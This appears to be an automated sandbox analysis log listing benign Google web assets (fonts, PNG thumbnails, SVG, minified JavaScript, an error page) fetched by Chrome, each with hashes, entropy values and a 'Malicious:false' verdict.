                                                                                                                                                                                                                                        SHA-512:B6C0273E30938C67D2CC260D04A7E356CA750F3FE332700FC739966041AFC010AB2E04739E6F627A88042EAD1A5B14F37C580EF6E00D6869DDDD2E303DD04D35
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTI3jw.woff2
                                                                                                                                                                                                                                        Preview:wOF2.............................................2..2.d.`?STATH.d....D.L. ..6.$.8. ....u.....QTr...<.m5k..)..-.....q.....?..sW..._..7......JE....FE22*.....N}..f.......t.N.!.v,......8q.'......p$.`fJ.JA:S..F.............'}..,...u..A..H...h<0.....G8...9_3.....q.....b ...0FB$,..........W.1...J. ..D..C@H.....D1.a.xp..(...c.v..|.A../O....K,O......L1z..&...H.1!aN...d..s.....:...f..S..P.A..I....%..)....6..r..].v`.....V......c...a.IuE......".H..i......B.#W.....s.R......m.?...H......$q`X....T.i)C..^w.>]. ..;..Dx.5.@.4.^.P....k..........g3..|..3.eYb.2hd.2K.L......wg-....;s......Q.'..(5..L'...*f.W...L....<.*.9k%.6.v.$......&.w.*...w4..k......6..Bj....R.B.r....d...I.5cb.8...{w'...6J..98.q-.HLa.".J?.-.>...3+......)..gtwvb.j.8u..vW."*U.:......y.......+:....D.7=l....9j.v...T8r. .........`...qp=.<Tr=...D......d....H.C.^,..%..S.:.=3.....s.9.$ .8~.Q....t>.6262..8..SP....s#.r.S>y..(M.......I(v..JUL.....$y9.EU...&z:..T....QD..Kn.....p.xI$,.,I.......n|...N.+
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):8262
                                                                                                                                                                                                                                        Entropy (8bit):4.9222185377974945
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:QFto3keWjDlteuLEeWMi1eOGAzT31O4c13X:6euexemeQT3/ctX
                                                                                                                                                                                                                                        MD5:686166009FA933A53B1E01188DFB9BCC
                                                                                                                                                                                                                                        SHA1:6A73F0F5DF8A2DB1573B8C21FB978296505B7311
                                                                                                                                                                                                                                        SHA-256:E2927415D5E2F2582B3AF6B53F7369CC0482DFB6DD7EDDC7D05BE73A24D00265
                                                                                                                                                                                                                                        SHA-512:F37B98209E5D73505533E8CB2375E319549403C6781ACBA39368716778A0CF234FE1A83C05482CAA9CA9B3055FF507BF07F8C9DC27E8676F64CEE726C434AF85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://www.gstatic.com/docs/documents/images/building-blocks-sidebar-promo.svg
                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="256" height="128" fill="none" viewBox="0 0 256 128">. <g clip-path="url(#a)">. <rect width="256" height="128" fill="#fff" rx="8"/>. <mask id="b" fill="#fff">. <path d="M0 8c0-4.41828 3.58172-8 8-8h240c4.418 0 8 3.58172 8 8v12H0V8Z"/>. </mask>. <path fill="#F0F4F9" d="M0 8c0-4.41828 3.58172-8 8-8h240c4.418 0 8 3.58172 8 8v12H0V8Z"/>. <path fill="#E1E3E1" d="M0 0h256H0Zm256 20.5H0v-1h256v1ZM0 20V0v20ZM256 0v20V0Z" mask="url(#b)"/>. <path fill="#444746" fill-rule="evenodd" d="M137 6h4c2.207 0 4 1.79333 4 4 0 2.2067-1.793 4-4 4h-4c-2.207 0-4-1.7933-4-4 0-2.20667 1.793-4 4-4Zm0 7h4c1.653 0 3-1.3467 3-3 0-1.65333-1.347-3-3-3h-4c-1.653 0-3 1.34667-3 3 0 1.6533 1.347 3 3 3Zm5.333-3.66667-2 1.99997-2-1.99997h4ZM204 8c0 1.10667-.893 2-2 2s-2-.89333-2-2 .893-2 2-2 2 .89333 2 2Zm-1 0c0-.55333-.447-1-1-1-.553 0-1 .44667-1 1s.447 1 1 1c.553 0 1-.44667 1-1Zm-1 2.6667c1.227 0 2.373.3333 3.353.9133.407.2333.647.68.647 1.1467V14h-8v-
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4219)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):120543
                                                                                                                                                                                                                                        Entropy (8bit):5.475551581614068
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:lhjbUsBO/MMbWk+MqY0nVKe1dpo65h5p/i1+o3+cCRv52YSNeyjmFX/pmbUF9sQI:7jgs+MVzJKeKMRdbcCR1PF9sQ2l8+
                                                                                                                                                                                                                                        MD5:DB1D9C6D2A8118F10F261F72A84B8D71
                                                                                                                                                                                                                                        SHA1:4BA867EDB7742FE524CF001BEFFAAA4F0ACC71FC
                                                                                                                                                                                                                                        SHA-256:7A51C23ACCA1996574BE67C22902100EFF6BBE64AC3522FBD9558F4E7D39D5BA
                                                                                                                                                                                                                                        SHA-512:4F4A6659040FE37E06FB4895814A67F86DB398A6A0CED03C8187B02541BE9348AD8FA7DCB20C40BE47CF12E4F0F277557742AF738F559CEC72AFDB51C5D2BD7D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
                                                                                                                                                                                                                                        Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),u=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.$jscomp$symbol$id_=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.rand
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3170
                                                                                                                                                                                                                                        Entropy (8bit):7.934630496764965
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:c2ZEPhMXQnPkVrTEnGD9c4vnrmBYBaSfS18:c2/XQnPGroGD9vvnXVaq
                                                                                                                                                                                                                                        MD5:9D73B3AA30BCE9D8F166DE5178AE4338
                                                                                                                                                                                                                                        SHA1:D0CBC46850D8ED54625A3B2B01A2C31F37977E75
                                                                                                                                                                                                                                        SHA-256:DBEF5E5530003B7233E944856C23D1437902A2D3568CDFD2BEAF2166E9CA9139
                                                                                                                                                                                                                                        SHA-512:8E55D1677CDBFE9DB6700840041C815329A57DF69E303ADC1F994757C64100FE4A3A17E86EF4613F4243E29014517234DEBFBCEE58DAB9FC56C81DD147FDC058
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......6.....%.`....)IDATx..].pT..>.l......b..(Hv7 D7.n.8....V..H_.R;S.hY`w.(..*.N_R."0`.-.A..|.*N..`....n..{.&..l.o..;.....a....d..$.................J.1.*.....7+.c...o..T/.~V.r.....D..G.Ic.....E_.FUR.&..U%...X.4!!Q.H";......e(Ic...$..."1..jR[.L..../Ek.}AH...W.L.V....Y..S..q...!._r.D....G,%...Hu.$q..\.j.x...G.....]....B.i.I.+B.....Hu.....Q...K;...J.q..._......_.x....A:......j....:c...^.....k=GIj..Y]B.V..m...Y.\....$..!....+.R%..U/;p.....R4.g.R...XH.3%..JHHby.eqOZdnS..$.. ....dn...$.w....E.o.8...b@.z.)5.L4|.F...9......pP.8.|....-.M..:..ux...7.]...'..(q..~.....KQ.W..,b..L<.Y.].V+....t4.$.V.O.....D.5..v.j...Hd.M....z.......V..q.p.......;:.J.%2.G.;./.E...!.H. ..../Dk.8.T....+..%Vs4..DC.R.`..Z..........0.[)N!.....%.>&.b.$.M....P.!...!....'Kv..Nd...mvR.:.L....w..y%.i..H..u....s.Se1.[.)."..)%.I.....(.#M..4.@....#.....X..P<...k..g....O..I..>-...'._.Q..T.y.=Z.GR{]..&t}*......>J..!,..X6.HC..$.:.}..z...._b.b.4.E.....;.Ha.?s.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):870417
                                                                                                                                                                                                                                        Entropy (8bit):5.754773036275944
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:QCUjTl1rkXepvNDXElW6mKMYpMdP1poSuyf/h:QCUjT/rkXC8WzdPkSuyf/h
                                                                                                                                                                                                                                        MD5:9554FD9A9E8B1A6D8489FEDE9D517376
                                                                                                                                                                                                                                        SHA1:C136B2DF147DAEDF2FCE8F103CA6BE5E73BB5198
                                                                                                                                                                                                                                        SHA-256:67A8E2DAD69D378AD8D8878DA08F8FFAA0E4DDA0C7E7402DFE30BA12E27EE431
                                                                                                                                                                                                                                        SHA-512:F14CA431950A95AC2FE3C0DA50BD2EBF6A1D8537CB96D93EDA4516C40260738F71A8A3FDC9B8D17659AAC2F9057B8A023E909A5DAA3384DEA8AA65E65B2B56AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:"use strict";_F_installCss(":root{--boq-chrometransition-background:#eee;--boq-chrometransition-active-background-opacity:0.8}.KL4X6e{background:var(--boq-chrometransition-background);bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:var(--boq-chrometransition-active-background-opacity)}.VfPpkd-JGcpL-uI4vCe-LkdAo,.VfPpkd-JGcpL-IdXvz-LkdAo-Bd00G{stroke:#6200ee;stroke:var(--mdc-theme-primary,#6200ee)}@media (-ms-high-contrast:active),screen and (forced-colors:active){.VfPpkd-JGcpL-uI4vCe-LkdAo,.VfPpkd-JGcpL-IdXvz-LkdAo-Bd00G{stroke:CanvasText}}.VfPpkd-JGcpL-uI4vCe-u014N{stroke:transparent}@keyframes mdc-circular-progress-container-rotate{to{transform:rotate(1turn)}}@keyframes mdc-circular-progress-spinner-layer-rotate{12.5%{transform:rotate(135deg)}25%{transform:rotate(270deg)}37.5%{transform:rotate(405deg)}50%{transform:rotate(540deg)}62.5%{transform:rotate(675deg)}75%{transform:rotate(810deg)}87.5%{transform:rotate(945deg)}100%{transform:rotate(3turn)}}@keyframe
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 41584, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):41584
                                                                                                                                                                                                                                        Entropy (8bit):7.995215789973138
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:cnPRm/UHl9U8GO5hwHxngXQ5lUAcPtU6Y3dC52hPgxSJ:cPRS0TjTcnEQ5GPLcdbhoUJ
                                                                                                                                                                                                                                        MD5:71151932FDCC1AC7E09BF80A592DDA78
                                                                                                                                                                                                                                        SHA1:7049019D7FA6D570CA9B57525224313656B36E8D
                                                                                                                                                                                                                                        SHA-256:68C3F849762D80F759A7702F52B6F9C432173951D7D5E830C98CEDFDEBA5E53E
                                                                                                                                                                                                                                        SHA-512:B438132A3327189B36CDF6675E52A4E319735A180AFA9B44261F3E1C36F5EDC86F4F8EDC873CAD4520FF639D5A2A617C84155F535516249D334BC02BF8815DA5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotomono/v23/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrmAB-W4.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......p......RL.............................4.`?STAT@..P........w..r..6.$..r. ........[J.qF..</(..RU...>.`.9.[%.N9....#.<H.;.Y.....".....x.GQ.3...p.Tx...r.Zs.j5.0...r..f..i.]O.xZ..|...&;......j.8.i..&.......]...G...u....F.......]cs.x..a...r7...Udw+.+;P.R..Jh....U...puXL...>A...E........w..l.r.:m...T.VA...o....i*.........Y./....H<@.(..0.Rp.....9FT{.}...]..[]....E.."...Tjr^..o..>...H....e H.mcD.u3V}K.......u...........[.D.F......-..v..v.d...1`....6*"....F...>VR.......:<.....2.m.16.{.....uw\:..rD:Q.3..k.K%.......h....F..N}w.h..db:R....{y...."...#.N..i.34...<..n.O.`$..$..x/..x...........;...:!v.#.c..`..M..w.1!U"].ce......J...b.....u,g.(.|+......%.}++...S...>.x.......o.+..L..>~{w...;..i.2.H..M....!K.#F.a.`..1[.-$>..9..y.:1..T.s/....u...V.C..`)..r....B....)"v...d0g+4....I.D.Ii.tw.ar.W.R5mO.......q0.Ys=>.A.U]...>.E.4U;n.....~.rx.....U9..v`.9./._...].$E..B..W....K...p)..)!...u.~...^.....I......N..o..Q......v....x.D..i.i........#.......
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):107989
                                                                                                                                                                                                                                        Entropy (8bit):7.9800242411626
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:49oCN1jflZ5rvX956J+CxgnEzO0sRspFMc:49zNtlZ5rP94JbxMz0sRsHn
                                                                                                                                                                                                                                        MD5:22B5B57B02866A8E1F377C7E5BC86FDD
                                                                                                                                                                                                                                        SHA1:7959ABE9C7C632360209364838E16F8909099A03
                                                                                                                                                                                                                                        SHA-256:929EC2B0F87A73827EFC23BF8BAC039070AA5857FF6DA2D642F9D42DDD0B9914
                                                                                                                                                                                                                                        SHA-512:77049D9FD57FCD67BB02AF6696B21008F870E26A0E542F6FD33A18DDD11FFD6F836C67A5133AFDE2FF355DB85BA6327BA93F4D513FD34B8E24C64D20596583DF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx..........#v3..M#.a._.v...v...........@X...ri.y)..p.&;......-.p.g(PUI*.[.ff..6..1.....6... ..t.......~.c...s.b^3f...0.u..............{$..s.b..Z..;.SH{....V[a>P0...^Y}...V.n.^X..j..+.^....;.K...x.V..ji....@~..0g.O..1....'..U'..z.}.[b..,./m2k....<....X.g....p..N.......J..E.E.]..{.....F(......Q..;.^.".[=po...G............X...s...r&...d....!...V.^.MC...>.....d..!;.N..ub......Q....Gh....(......F...(q..l..$...%m...'..]...z+.?[?5...b.......g4u'w...l..s.MV..3.wXf`.fF..!...!w..9..ln<_......m..N.K.n.b>Hp.\........X:GB._..^BW.g...p>=::a.1.F..6.("7..k....h..W.J....2&5...`..%....C.....R.Ph`.."..@.v}...7..4.....D:.B..bi."..@..$:JP..S..[..i..\..G.N...r.c..LLf.Q.[m..]kK...S.{._m.....K.Z.da.....g..........A .V.........m....../.%I...+..c.4.~].\f.{hW.P....G.,.e....Q.,.}...@y...p[.,#{!B...a.<./.[........z....=.}.../w...wi=....... ...z.... ....6...,..$....jv....W...&B..7...W]....{...........X6.........g^935.)...9u<~...B
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 41220, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):41220
                                                                                                                                                                                                                                        Entropy (8bit):7.99561943989194
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:gPAZkLg3cRlItx1huSxyO1hGxVgw8XQ5OgBRoKYMU1ZS/lgF9:g4k83xPuSxy6kxVgwCQ5r0hjA/g
                                                                                                                                                                                                                                        MD5:C8D3E0F677AC007C9FADBA09A1C4C7BC
                                                                                                                                                                                                                                        SHA1:83389D80FDF1BEE58E69DB1F38968404EAC57846
                                                                                                                                                                                                                                        SHA-256:A9ED2DC63202E8E1E06CC22EB23D39212A36034D90DBC76274EC7F85DEB1D3C2
                                                                                                                                                                                                                                        SHA-512:849C7C1D32C22286CB4216D92E2FA55E65FC3CD621780153F3758190694C0FB74821533B6F043C081F9B9327E5B911978B8BF7A79E12C1823090A5BE43200DF6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotomono/v23/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAOW4.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............Q..............................4.`?STATD..P.....t..'..r..6.$..r. ..r.....[..q.y.g...C..MV0..@w..{.5...q.b.<_...g'.2.z.n..4..{..D..)s48J.2U.LToD ...Q3e..~..3J.K&..6.J...J..X6.l.S..n.h...h..w.N...........2).x...T.^.....~........ .-..a....=..l{dK..).S...X.:....V.......k.?..z.!.>..20v....c......j..A..5...D....M(....v.w..3..:...:.:g.;sgE.M.#....6...E..@%%.OQ...R?.C.n......2&!.2....,B..5$.(2D..Q....vX..X.a..V......u..[..(EZ....(.D.{{..U.dM.`#%F.........Gic....z.O.....k.UJ.t..#...P*1A...?....yI.F....I.,..y`f..K.-Z... .....m0.%q....[Wz../.....k7..1..j....{.Py.....e..b..@...g.s?X3.H....y...I.A....y.H....x..a.]..B.(.&Ai@...19.D.4.a..ky.........F...4.N.Bw........... K. A.......6w...5........%DL#.o...>0...C~|.L....v.B!... p}....n.p....!..;...^.$F..3!9".....Ak....~f."8%@f-u.Op..T..[..r.{...B.H.".(....|.P./V....v...}T..r+.p....x.....r....?...;fO@.........T....r.$.....w..........|.%..?...?S..*..@.5.k..h..4.|.o..$......4@V7)..:@........>..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1555
                                                                                                                                                                                                                                        Entropy (8bit):5.249530958699059
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
                                                                                                                                                                                                                                        MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                                                                                                                                                                                                        SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                                                                                                                                                                                                        SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                                                                                                                                                                                                        SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14365
                                                                                                                                                                                                                                        Entropy (8bit):7.881211916978825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:c1cqDphBfgHiqCJi/qc0OtwmJ/P9YZvx+V9B:6jdgrrj0Otww3B
                                                                                                                                                                                                                                        MD5:F19627756DF8AFCE4F7C343B17016F54
                                                                                                                                                                                                                                        SHA1:59CD4AD429E2C83481A368BEDA6124E44C70A4F5
                                                                                                                                                                                                                                        SHA-256:17059F06C71697CA310E9E6D8259CAACFB6F9C8B427D50C0DB333E52D0D739AE
                                                                                                                                                                                                                                        SHA-512:C74F71122B2C4BC7646757FC5A96C70A897D5C61259A5AB56E6871932C62F928C756F112D131DA9924B080DC735CFC6166AC90378E87861D0E841CE9382F1924
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..7.IDATx...A.....0.....9..2.2}.@e.@X..... ,.a........a...@X..... ,@X..... ,.a............@X..... ,@X..... ,..a..SMG..Q...m...N....Y^..o[d`.i..2.x.nh*..,.]#.,.8.=.D....4t......w....2....B..g..7..(.....u.C,V........A..(@..k....\$8uUA.E....E.:....Y............P$...."K@.2...E.V.T.v.A.(..?.Q..t./l.m.m.........J*.f.Q%...g..nQQ...^_o..iomi....i.11...s...0>>nw{.....e..;[.......jin.ZLS...g<....D!......>......%%.&....c..g6@.........z]fF...zsS#.W....j.....1.........N7y+...w.[.......5..]...:.J!j.....-/-....l..z.6.X.6 5=9..`Z_[1.Hjb|...<8(.. ...*.'\.]VWU....H8..(/.A$......,..`eef.....T.,...e.........8f.q;..........8..%%%2F...&..NO.altd...b6..\.1.C...;.`*b;..9.....k.&....=:2LbGmX.F.$..LM.\c..uzrDP?>:D....t..HP........`4......*P.|..4D...0.Wj...,.QO2:.......4.... ...T......`..".X.....`.62<..X"..h's.1...V.E........F.Nj..M...F..O..>....cC70.....X..k}..9.\YZ.XZ.J...lsc......Ij....V..%o.`....`....?.XP...,&.M..q......Cj.X.U.d2.....q{3
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):67347
                                                                                                                                                                                                                                        Entropy (8bit):7.991601773885828
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:YPBq40FDaSMUwwxJjUE05wdiBVTpMJk0FUPw8CKZff4Ax5uF:0Bq40FZbfS6iBv90FL8XZff4Axo
                                                                                                                                                                                                                                        MD5:19350EC12112FFC74E634B7EF74103C8
                                                                                                                                                                                                                                        SHA1:090B48536A6A4375411B72FC606D4E82FCB76FBE
                                                                                                                                                                                                                                        SHA-256:FAFE2B8D1384FD725C9E71F900ECEE851E66EE91224984416956B7CA7A58FAD4
                                                                                                                                                                                                                                        SHA-512:A8217438E17A1030566EE6848A6D9FC2F15BD025C4C5C9BBA4624EAE2F2613BA360CDC56F5A92CF353DB924D1F7538CCA7BC4496581B34EECC571C7D0846212C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1DxD51d4g2qLRA3NNYcyVDUoqnrLjZRjSglHi6o9pxns_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx..............D..x......P..a....o%..!...N\....a...`X.a....a...`X......a...`X...`X.a....a...`X..=.dm.fY.?[.e...NQ.UU....}..9..K.$..q\.5..N.VY../...y.vXy.7M....7....4..i....{H....a....f.. ...0.O(QJ.!E.. BA$@. @*...(@!.@$..JB%.H@... ...*...<..;GwN....2...7...=..J$.....,.....%....f..j6...y ..gx.B...%\,.@Q.....E.z.f.1B.w...(.}ZB.Ap:....B.r..:..~.....f3...?E...^.g..."..x<X<.Vb...C..`0`W....u%........'..t......h.z=`.Z..L......Z .Z-.H..\...t4.M,.3..r.....o.g..i.\^....V..d2 ..a..zr...a:.~....v.J%......x...)...;!..DL&.V..^..R.J...r..v;lK..*N.=...`..p..j<...@Q.%d.v.F....R).J%.I....#+.."..h4j0.>C...~..FX.....T*@.n.......L$..R.mR..Xp....a...d2Q*.@.z..;O.C...p.....1.AQ...b2.e....RVeT.......,f.,&....e.0(...?..s.r...t...u^....5b.. ..jU^...z=nS.Uq.^.[ .@..6..oC,..\....E....q.^...._.J...q....D.Q$.W%N.e.r...y.........[.x.....~.......x<....M,..a}"1....V.).z..)..g2..R+.jE.L&.3.R+.2;.F1..)......z4.Q{..a.5...N\.X.`QWbU.5... ..X,..n.T.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):67606
                                                                                                                                                                                                                                        Entropy (8bit):7.990423651927193
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:igVbP+lk4CGoDOyseXFVr8MsPXSIRlK8T12Req4vSOPJUfbOKhjYrTOhHdgr:igVb+lkxDO6XFVoV3KgEeq4301h0HOxi
                                                                                                                                                                                                                                        MD5:0336C790895777BA2F7FAA1DAD5879E3
                                                                                                                                                                                                                                        SHA1:4F7D97C9F479FA529A2E7FCF832285D8A0DAD410
                                                                                                                                                                                                                                        SHA-256:ED362E81898689DB68073DE710698EB412A79C6296F8890B27E0C38EEAF8C5CB
                                                                                                                                                                                                                                        SHA-512:0AE860C90AFFDCF35B93E80F72467053B1800CB3F36695C15D25D8B5B4A5ED7FD6D2921CB9096517DA59C1A3F8216130571DA35290741CA0184FE310C640FB02
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1px-g7XmAy4HG-4jD5FSqZYTJoemPDQNL34xpf9smY1Y_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......... .Os....E.. ,@X..... ,.a.......A..?....=cm.?.J..B=.~.f....K...|.;.Y.#.K*.Ln.91...t....TG..B.(.1...[.+.F.._.C.J..d8b:.j-..a;.|....(.P).j{....g..tc9.(.?Jr..l....B./.7{.U..H.VuuQ.....(d..f........Bb!.......^..j.+F.`...?/v.S.R\(.1.!....Qu..Ump..]+Z/...?tg.V..yJ.......k2.s....(m.n...V...*.'....th+.}....+..S.<..qz5./v....zo....3.........o...3.%.X....Xd....k^nt....m.8...B..........M}|U.^T.sv......Y...\....8..6...y.D*..V...QH{~'..HEtE...$j.X%.98.H6.....k....d..'.6....=M.....K....q.[u....SUV.Vn.\.S. ?.$.<9pf..v...M.+...OE.y8.u9.n.E.r`....Q.a.E!b..M.{.-....Mu.#........7.....m.7..4.uH......G....MH..>~....f.t.....V.......`YI}r.a.+.D...6-uv[../.a.&+..^/q[:..k...=.......={.^/....8... .p.`..m7:'...(..icD...%3{..JO'...!...$..j...5$U(J..TJX..5..5c...oOcj..(...cU\*..._....;.D.j..D.)....2..xT..(.G....".S..y...h#.......Ogv.zW..9.N7.'N..L...X...=d.Y.L~vz.}.q...$........*.P....g.....<T..HK.Du.J...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 100756, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):100756
                                                                                                                                                                                                                                        Entropy (8bit):7.997403019876083
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:u1cBLNytW4L2twQPpIoRuqamQ1SgRwwENO51ev:KE5yttYpX0mR5wmv
                                                                                                                                                                                                                                        MD5:4498A1A925FD2D5630BA89B78739E194
                                                                                                                                                                                                                                        SHA1:C757EDCF6538B1F0968F69A7618C564DCAF7150A
                                                                                                                                                                                                                                        SHA-256:54EFCB5570863B2329C2C677749C85C7ED337F5C16BF38CAEA17807196150293
